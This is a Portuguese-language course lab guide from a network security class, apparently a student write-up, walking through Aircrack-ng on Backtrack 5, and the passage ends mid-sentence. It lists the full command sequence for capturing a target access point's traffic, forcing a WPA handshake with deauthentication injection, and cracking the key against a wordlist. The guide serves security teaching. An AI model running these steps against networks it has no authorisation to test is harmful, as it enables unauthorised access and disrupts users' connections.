Roteiro Aircrak_rafael_folha
416 palavras
2 páginas
SERVIÇO NACIONAL DE APRENDIZAGEM COMERCIALFACULDADE DE TECNOLOGIA SENAC PELOTAS
Unidade Curricular – Segurança em Redes
Prof. Eduardo Maroñas Monks
Roteiro de Laboratório
Ferramentas de Segurança
Objetivo:
Analisar e demonstrar a aplicação da ferramenta Aircrack .
Ferramentas:
Backtrack 5 r3
Introdução:
Neste roteiro de laboratório, será analisada e demonstrada a ferramenta Aircrack utilizada para efetuar ataques a senhas de rede sem fio.
Tarefas:
1) Efetuar download da iso do Backtrack disponivivel em: ftp://192.168.200.3/bt3final.iso e realizar as seguintes tarefas:
1. Entrar no modo LiveCD
1. Verificar ifconfig se a placa de rede sem fio esta presente com o comando #
2. Iniciar o Aircrack
1. Aircrack já é nativo do Backtrack, sendo assim não é necessário baixar a ferramenta. 2. Executar os seguintes comandos
3. # airmon-ng , para iniciar a ferramenta.
4. # airmon-ng start wlan0 para iniciar o modo monitoramento. (Neste caso foi criado o modo "mon0", que será utilizado para a captura de pacotes.)
5. # airodump-ng mon0 para listar e analisar as redes sem fios disponíveis, devera ser mostrado uma tela igual a figura 1
Figura 1: Redes sem fio disponiveis
3. Iniciando o ataque a rede sem fio escolhida:
1. Executar os seguintes commandos:
1) airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write XX mon0 ( onde o bssid será o endereço MAC do AP, channel o canal que ele esta escutado e write um nome para salvar o arquivo a ser criado.) 2) Com o comando acima sendo executado, será necessário gerar um tráfego para capturar dados de Handshake, abra uma outra aba do prompt de comando e digite o comando # aireplay-ng -0 100 -a
XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX mon0 , sendo que
100 é a quantidades de injeções a ser realizado no alvo , -a o BSSID do AP e -c o MAC do cliente.
4. Atacando a rede alvo.
1. Executar o seguinte comando:
1) # aircrack-ng XXX.cap -w /pentest/password/wordlists/darkc0de.lst ( onde o xxx